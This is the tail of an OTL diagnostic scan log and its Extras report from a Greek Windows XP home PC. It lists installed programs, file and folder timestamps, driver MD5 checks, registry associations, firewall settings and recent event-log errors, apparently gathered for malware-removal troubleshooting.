[2005/11/08 00:37:23 | 000,000,155 | ---- | C] () -- C:\WINDOWS\winamp.ini
[2005/11/07 18:59:52 | 000,000,058 | ---- | C] () -- C:\WINDOWS\autmtst.ini
[2005/09/22 12:38:26 | 000,010,240 | ---- | C] () -- C:\WINDOWS\System32\vidx16.dll
[2005/09/22 12:30:33 | 000,000,029 | ---- | C] () -- C:\WINDOWS\SIERRA.INI
[2005/07/20 16:07:00 | 001,724,416 | ---- | C] () -- C:\WINDOWS\System32\nvwdmcpl.dll
[2005/07/20 16:07:00 | 001,503,232 | ---- | C] () -- C:\WINDOWS\System32\nview.dll
[2005/07/20 16:07:00 | 001,101,824 | ---- | C] () -- C:\WINDOWS\System32\nvwimg.dll
[2005/07/20 16:07:00 | 000,540,672 | ---- | C] () -- C:\WINDOWS\System32\nvhwvid.dll
[2005/07/20 16:07:00 | 000,466,944 | ---- | C] () -- C:\WINDOWS\System32\nvshell.dll
[2005/04/04 17:46:45 | 000,363,520 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2005/03/27 21:47:11 | 000,002,112 | ---- | C] () -- C:\WINDOWS\Lexicon.ini
[2005/03/24 16:14:30 | 000,000,000 | ---- | C] () -- C:\WINDOWS\OpPrintServer.INI
[2005/03/24 16:12:50 | 000,007,680 | ---- | C] () -- C:\WINDOWS\System32\CNMVS5y.DLL
[2005/03/13 18:22:26 | 000,124,928 | ---- | C] () -- C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2005/03/13 13:02:43 | 000,000,049 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
[2005/03/13 12:52:28 | 000,000,748 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2005/03/13 12:40:09 | 000,000,169 | ---- | C] () -- C:\WINDOWS\RtlRack.ini
[2005/03/13 12:38:27 | 000,000,164 | ---- | C] () -- C:\WINDOWS\avrack.ini
[2004/12/20 11:08:28 | 000,155,648 | ---- | C] () -- C:\WINDOWS\System32\xvidvfw.dll
[2004/12/20 11:03:26 | 000,679,936 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll
[2002/03/21 15:39:02 | 000,073,728 | ---- | C] () -- C:\WINDOWS\System32\UNACEV2.DLL

========== LOP Check ==========

[2005/03/13 13:06:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\ACD Systems
[2006/02/15 20:22:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Electronic Arts
[2008/04/19 15:58:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2008/07/02 20:43:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\ESET
[2008/10/12 23:29:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PlayFirst
[2008/11/22 00:27:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Sandlot Games
[2008/11/22 00:47:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\FreshGames
[2009/05/11 17:25:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Oberon Games
[2009/10/11 00:50:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Fugazo
[2009/11/09 15:04:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\FarmFrenzy-PizzaParty
[2009/12/07 22:57:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\NeoEdge Networks
[2005/03/13 13:08:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\ACD Systems
[2006/02/13 10:23:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Webshots
[2007/03/18 22:44:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Sony
[2007/03/18 22:45:28 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Publish Providers
[2007/04/17 14:47:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Lionhead Studios
[2007/11/07 16:47:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\BSplayer Pro
[2007/11/17 14:32:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Leadertech
[2008/07/02 20:44:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\ESET
[2008/09/05 13:04:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\SystemRequirementsLab
[2008/10/12 23:29:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\PlayFirst
[2008/11/04 00:09:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Pogo Games
[2009/01/12 22:08:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Gamelab
[2009/03/10 22:22:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\uTorrent
[2009/03/11 00:29:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\GOL_byHasbro
[2009/03/11 16:31:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\GamesCafe
[2009/05/11 17:25:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Oberon Games
[2010/01/08 18:28:20 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\BSplayer

========== Purity Check ==========



========== Custom Scans ==========


< %SYSTEMDRIVE%\*.exe >
[2001/05/24 12:59:30 | 000,162,304 | ---- | M] () -- C:\UNWISE.EXE


< MD5 for: AGP440.SYS >
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:AGP440.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:AGP440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys
[2004/08/04 08:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\$NtServicePackUninstall$\agp440.sys

< MD5 for: ATAPI.SYS >
[2002/09/30 12:00:00 | 010,188,778 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp1.cab:atapi.sys
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2002/09/24 13:42:10 | 010,188,778 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp1.cab:atapi.sys
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:atapi.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys
[2002/09/30 12:00:00 | 000,086,912 | ---- | M] (Microsoft Corporation) MD5=95B858761A00E1D4F81F79A0DA019ACA -- C:\WINDOWS\system32\ReinstallBackups\0005\DriverFiles\i386\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/04 07:59:42 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys

< MD5 for: EVENTLOG.DLL >
[2004/09/04 15:45:02 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=6C85C5FC9D14B07E21A7D3EA8861CD93 -- C:\WINDOWS\$NtServicePackUninstall$\eventlog.dll
[2008/04/14 18:29:28 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=D863F2C887B64521B8E734E062BA79F2 -- C:\WINDOWS\ServicePackFiles\i386\eventlog.dll
[2008/04/14 18:29:28 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=D863F2C887B64521B8E734E062BA79F2 -- C:\WINDOWS\system32\eventlog.dll

< MD5 for: NETLOGON.DLL >
[2008/04/14 18:29:44 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=017BBF0DA6278CF8F278C30ADC6FB8CB -- C:\WINDOWS\ServicePackFiles\i386\netlogon.dll
[2008/04/14 18:29:44 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=017BBF0DA6278CF8F278C30ADC6FB8CB -- C:\WINDOWS\system32\netlogon.dll
[2004/09/04 15:45:10 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=E57F2E449533D8943D432720958A3706 -- C:\WINDOWS\$NtServicePackUninstall$\netlogon.dll

< MD5 for: SCECLI.DLL >
[2004/09/04 15:45:12 | 000,186,880 | ---- | M] (Microsoft Corporation) MD5=1BF213CBF53F8EE3B833EF9C70D3DC6D -- C:\WINDOWS\$NtServicePackUninstall$\scecli.dll
[2008/04/14 18:29:56 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=790E8153E8B872542D19BB7F0C0FBFD8 -- C:\WINDOWS\ServicePackFiles\i386\scecli.dll
[2008/04/14 18:29:56 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=790E8153E8B872542D19BB7F0C0FBFD8 -- C:\WINDOWS\system32\scecli.dll

< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job /lockedfiles >

< %systemroot%\system32\drivers\*.sys /lockedfiles >
[2009/01/12 16:24:50 | 000,096,384 | ---- | M] () Unable to obtain MD5 -- C:\WINDOWS\system32\drivers\sptd7533.sys
[2006/10/09 14:34:58 | 000,642,560 | ---- | M] () Unable to obtain MD5 -- C:\WINDOWS\system32\drivers\sptd.sys
[2006/10/09 14:36:34 | 000,223,128 | ---- | M] () Unable to obtain MD5 -- C:\WINDOWS\system32\drivers\dtscsi.sys

< %systemroot%\System32\config\*.sav >
[2005/03/13 12:09:08 | 000,413,696 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav
[2005/03/13 12:09:08 | 000,634,880 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav
[2005/03/13 12:09:08 | 000,094,208 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav
< End of report >

EXTRAS.txt

OTL Extras logfile created on: 8/2/2010 10:14:32 μμ - Run 1
OTL by OldTimer - Version 3.1.28.0 Folder = C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000408 | Country: Ελλάδα | Language: ELL | Date Format: d/M/yyyy

511,00 Mb Total Physical Memory | 206,00 Mb Available Physical Memory | 40,00% Memory free
1,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 24,40 Gb Total Space | 3,30 Gb Free Space | 13,53% Space Free | Partition Type: FAT32
Drive D: | 12,83 Gb Total Space | 3,31 Gb Free Space | 25,82% Space Free | Partition Type: FAT32
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
Drive I: | 232,83 Gb Total Space | 213,12 Gb Free Space | 91,53% Space Free | Partition Type: FAT32

Computer Name: HOME-VYXPNW9L30
Current User Name: Bougioukli Sofia
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 14 Days
Output = Standard
Quick Scan

========== Extra Registry (SafeList) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] --

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office10\msohtmed.exe" %1 (Microsoft Corporation)
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
https [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [ACDBrowse] -- "C:\Program Files\ACD Systems\ACDSee\7.0\ACDSee7.exe" "%1" (ACD Systems Ltd.)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [Winamp.Enqueue] -- "C:\Program Files\Winamp\winamp.exe" /ADD "%1" (Nullsoft)
Directory [Winamp.Play] -- "C:\Program Files\Winamp\winamp.exe" "%1" (Nullsoft)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"F:\HIW\stInstall.exe" = F:\HIW\stInstall.exe:*:Enabled:Thomson Home Install Wizard -- File not found
"C:\Program Files\Mozilla Firefox\firefox.exe" = C:\Program Files\Mozilla Firefox\firefox.exe:*:Enabled:Mozilla Firefox -- (Mozilla Corporation)
"C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" = C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe:*:Enabled:Yahoo! Messenger -- (Yahoo! Inc.)
"C:\Program Files\uTorrent\uTorrent.exe" = C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent -- (BitTorrent, Inc.)
"C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe" = C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe:*:Enabled:Sony Ericsson Media Manager 1.2 -- (Sony Creative Software Inc.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00120409-78E1-11D2-B60F-006097C998E7}" = Microsoft FrontPage 2000
"{00203668-8170-44A0-BE44-B632FA4D780F}" = Adobe AIR
"{01501EBA-EC35-4F9F-8889-3BE346E5DA13}" = MSXML4 Parser
"{01521746-02A6-4A72-00BD-A285DF6B80C6}" = The Sims 2 University
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}" = Java™ 6 Update 17
"{3248F0A8-6813-11D6-A77B-00B0D0160070}" = Java™ 6 Update 7
"{350C9408-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{4AE3A0CB-87B0-4F51-BECD-3D1F8DFDD62F}" = OTEnet-SAGEM Fast 800
"{5B09BD67-4C99-46A1-8161-B7208CE18121}" = QuickTime
"{5EC86106-2B0A-4595-B03C-15E2241C1AC5}_is1" = Community Expansion Pack version 1.01b
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6B629F70-BE1D-456E-AA97-73619020E7A1}" = Sony Sound Forge 7.0
"{6E7DD182-9FC6-4651-0095-2E666CC6AF35}" = The Sims 2
"{77DCDCE3-2DED-62F3-8154-05E745472D07}" = Acrobat.com
"{7C503E58-B2BC-11D5-978A-0050BA84F5F7}" = Neverwinter Nights
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{90110408-6000-11D3-8CFE-0050048383C9}" = Microsoft Office XP Professional
"{9EB1504E-FD95-4BCD-8E93-B4039F59C469}" = Sony Ericsson Media Manager 1.2
"{A1350B64-1AF8-497B-AC07-307DF67FB8D4}" = ESET Smart Security
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{AC64B069-151A-4E5B-9274-DF7ABD779578}" = Top Chef Demo
"{AC76BA86-7AD7-1033-7B44-A93000000001}" = Adobe Reader 9.3
"{AC76BA86-7AD7-5464-3428-900000000004}" = Spelling Dictionaries Support For Adobe Reader 9
"{B0625F16-B742-4F75-9FD8-20B47ACC7DE2}" = ACDSee 7.0 PowerPack
"{B2F5D08C-7E79-4FCD-AAF4-57AD35FF0601}" = Adobe Illustrator CS2
"{B74F042E-E1B9-4A5B-8D46-387BB172F0A4}" = Apple Software Update
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C950420B-4182-49EA-850A-A6A2ABF06C6B}" = Marvell Miniport Driver
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CE10CFE5-FA4B-4D01-B587-7EBB77505C7E}" = 3M Littmann Introduction to Heart Sounds
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D958FAC4-BAE0-4B1D-A42E-DE9BFDE7DDEE}" = Canon PhotoRecord
"{DFEF49D9-FC95-4301-99B9-2FB91C6ABA06}" = The Sims™ 2 Seasons
"{EA4FA30B-7321-4428-90E9-28B088EC8DC9}" = Runtime 8.0 Libraries
"{FB08F381-6533-4108-B7DD-039E11FBC27E}" = Realtek AC'97 Audio
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
"Adobe Illustrator CS2" = Adobe Illustrator CS2
"Adobe SVG Viewer" = Adobe SVG Viewer 3.0
"Broken Sword" = Broken Sword
"BSPlayerf" = BS.Player FREE
"CANONBJ_Deinstall_CNMCP5y.DLL" = Canon PIXMA iP1500
"CCleaner" = CCleaner
"CDisplay_is1" = CDisplay 1.8
"CNXT_MODEM_PCI_VEN_14F1&DEV_2F00&SUBSYS_200414F1" = SoftK56 Data Fax Voice Speakerphone CARP
"com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1" = Acrobat.com
"dBpowerAMP AAC to Mp4 Codec" = dBpowerAMP AAC to Mp4 Codec
"dBpowerAMP Music Converter" = dBpowerAMP Music Converter
"dBpowerAMP Nero Mp4 Codec" = dBpowerAMP Nero Mp4 Codec
"Easy-PhotoPrint" = Canon Utilities Easy-PhotoPrint
"Easy-PrintToolBox" = Canon Utilities Easy-PrintToolBox
"Easy-WebPrint" = Easy-WebPrint
"Farm Frenzy Pizza Party1.0" = Farm Frenzy Pizza Party
"Hotel Dash - Suite Success" = Hotel Dash - Suite Success (remove only)
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"ie7" = Windows Internet Explorer 7
"ie8" = Windows Internet Explorer 8
"Image Composer" = Microsoft Image Composer 1.5
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"mgfrench2_is1" = MAGENTA - French-Greek-French Dictionary 2006
"mggld2006_is1" = MAGENTA - GOLDEN VERSION 2006 - English-Greek-English dictionar
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox (3.5.7)" = Mozilla Firefox (3.5.7)
"NeroMultiInstaller!UninstallKey" = Nero Suite
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"NOD32 v3.x FiX 1.1 by TemDono_is1" = NOD32 v3.x FiX 1.1 by TemDono (Free Updates - Expire in 2050)
"NVIDIA Drivers" = NVIDIA Drivers
"SystemRequirementsLab" = System Requirements Lab
"SYSTRAN Premium 4.0" = SYSTRAN Premium 4.0
"The Game Of Life by Hasbro1.0" = The Game Of Life by Hasbro
"Webshots Desktop" = Webshots Desktop
"Winamp" = Winamp
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows XP Service Pack" = Windows XP Service Pack 3
"WinRAR archiver" = WinRAR archiver
"WMFDist11" = Windows Media Format 11 runtime
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"XviD_is1" = XviD MPEG-4 Video Codec
"Yahoo! Companion" = Yahoo! Toolbar
"Yahoo! Messenger" = Yahoo! Messenger
"Yahoo! Software Update" = Yahoo! Software Update

========== HKEY_CURRENT_USER Uninstall List ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"uTorrent" = µTorrent

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 1/7/2009 2:02:39 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Application Error | ID = 1000
Description = Ελαττωματική εφαρμογή nwmain.exe, έκδοση 1.6.4.0, ελαττωματική λειτουργική
μονάδα nwmain.exe, έκδοση 1.6.4.0, ελαττωματική διεύθυνση 0x003cddd0.

Error - 30/8/2009 1:47:25 μμ | Computer Name = HOME-VYXPNW9L30 | Source = crypt32 | ID = 131083
Description = Αποτυχημένη εξαγωγή από το αρχείο cab αυτόματης ενημέρωσης, της ριζικής
λίστας άλλου κατασκευαστή: <http://www.download....uthrootstl.cab>
με σφάλμα: Ένα απαιτούμενο πιστοποιητικό δεν είναι εντός της περιόδου ισχύος του,
κατά την επαλήθευση με βάση το τρέχον ρολόι συστήματος ή τη χρονική σήμανση στο
υπογεγραμμένο αρχείο.

Error - 30/8/2009 1:47:25 μμ | Computer Name = HOME-VYXPNW9L30 | Source = crypt32 | ID = 131083
Description = Αποτυχημένη εξαγωγή από το αρχείο cab αυτόματης ενημέρωσης, της ριζικής
λίστας άλλου κατασκευαστή: <http://www.download....uthrootstl.cab>
με σφάλμα: Ένα απαιτούμενο πιστοποιητικό δεν είναι εντός της περιόδου ισχύος του,
κατά την επαλήθευση με βάση το τρέχον ρολόι συστήματος ή τη χρονική σήμανση στο
υπογεγραμμένο αρχείο.

Error - 16/10/2009 2:37:08 μμ | Computer Name = HOME-VYXPNW9L30 | Source = MsiInstaller | ID = 11711
Description = Προϊόν: Microsoft .NET Framework 2.0 Service Pack 2 -- Error 1711.Παρουσιάστηκε
σφάλμα κατά την εγγραφή των πληροφοριών εγκατάστασης στο δίσκο. Βεβαιωθείτε ότι
υπάρχει αρκετός διαθέσιμος χώρος στο δίσκο και κάντε κλικ στο κουμπί "Επανάληψη"
ή στο κουμπί "Άκυρο" για να τερματίσετε την εγκατάσταση.

Error - 16/10/2009 2:37:08 μμ | Computer Name = HOME-VYXPNW9L30 | Source = MsiInstaller | ID = 11711
Description = Προϊόν: Microsoft .NET Framework 2.0 Service Pack 2 -- Error 1711.Παρουσιάστηκε
σφάλμα κατά την εγγραφή των πληροφοριών εγκατάστασης στο δίσκο. Βεβαιωθείτε ότι
υπάρχει αρκετός διαθέσιμος χώρος στο δίσκο και κάντε κλικ στο κουμπί "Επανάληψη"
ή στο κουμπί "Άκυρο" για να τερματίσετε την εγκατάσταση.

Error - 16/10/2009 2:37:08 μμ | Computer Name = HOME-VYXPNW9L30 | Source = MsiInstaller | ID = 11711
Description = Προϊόν: Microsoft .NET Framework 2.0 Service Pack 2 -- Error 1711.Παρουσιάστηκε
σφάλμα κατά την εγγραφή των πληροφοριών εγκατάστασης στο δίσκο. Βεβαιωθείτε ότι
υπάρχει αρκετός διαθέσιμος χώρος στο δίσκο και κάντε κλικ στο κουμπί "Επανάληψη"
ή στο κουμπί "Άκυρο" για να τερματίσετε την εγκατάσταση.

Error - 16/10/2009 2:43:22 μμ | Computer Name = HOME-VYXPNW9L30 | Source = HotFixInstaller | ID = 5000
Description = EventType visualstudio8setup, P1 microsoft .net framework 2.0-kb974417,
P2 1032, P3 1618, P4 msi, P5 f, P6 9.0.40302.0, P7 install, P8 x86, P9 xp, P10
0.

Error - 7/12/2009 4:57:50 μμ | Computer Name = HOME-VYXPNW9L30 | Source = crypt32 | ID = 131083
Description = Αποτυχημένη εξαγωγή από το αρχείο cab αυτόματης ενημέρωσης, της ριζικής
λίστας άλλου κατασκευαστή: <http://www.download....uthrootstl.cab>
με σφάλμα: Παρουσιάστηκε εσωτερικό σφάλμα αλληλουχίας πιστοποιητικών.

Error - 7/1/2010 1:52:06 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Application Error | ID = 1000
Description = Ελαττωματική εφαρμογή winword.exe, έκδοση 10.0.2627.0, ελαττωματική
λειτουργική μονάδα winword.exe, έκδοση 10.0.2627.0, ελαττωματική διεύθυνση 0x00286044.

Error - 7/1/2010 2:33:17 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Microsoft Office 10 | ID = 1000
Description = Faulting application powerpnt.exe, version 10.0.2623.0, faulting module
powerpnt.exe, version 10.0.2623.0, fault address 0x0026cc2b.

[ System Events ]
Error - 8/2/2010 3:34:42 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
